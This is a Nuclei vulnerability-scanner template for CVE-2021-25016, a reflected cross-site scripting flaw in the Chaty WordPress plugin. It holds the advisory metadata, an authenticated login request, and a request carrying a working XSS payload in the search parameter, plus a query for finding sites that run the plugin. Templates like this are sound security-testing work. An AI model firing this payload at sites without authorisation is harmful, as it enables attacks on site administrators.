id: CVE-2021-25016 info: name: Chaty < 2.8.2 - Cross-Site Scripting author: luisfelipe146 severity: medium description: | The Chaty WordPress plugin before 2.8.3 and Chaty Pro WordPress plugin before 2.8.2 do not sanitise and escape the search parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting. remediation: Fixed in 2.8.3 reference: - https://wpscan.com/vulnerability/b5035987-6227-4fc6-bc45-1e8016e5c4c0 - https://nvd.nist.gov/vuln/detail/CVE-2021-25016 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25016 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-25016 cwe-id: CWE-79 epss-score: 0.00106 epss-percentile: 0.42946 cpe: cpe:2.3:a:premio:chaty:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 vendor: premio product: chaty framework: wordpress publicwww-query: "/wp-content/plugins/chaty/" tags: wpscan,cve,cve2021,wordpress,wp-plugin,xss,authenticated,chaty http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - | GET /wp-admin/admin.php?page=chaty-contact-form-feed&search=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1 Host: {{Hostname}} cookie-reuse: true matchers-condition: and matchers: - type: word part: body words: - "search=" - "chaty_page_chaty" condition: and - type: word part: header words: - text/html - type: status status: - 200 # digest: 4a0a00473045022100bd1222663c2faae5803b3448a23a37f1785c22175e961f52c91a26c8faa295570220478b5b964fa4b88eafb419e118e920e5c9c3c3092effe03489346fe3e6bbd9ca:922c64590222798bb761d5b6d8e72950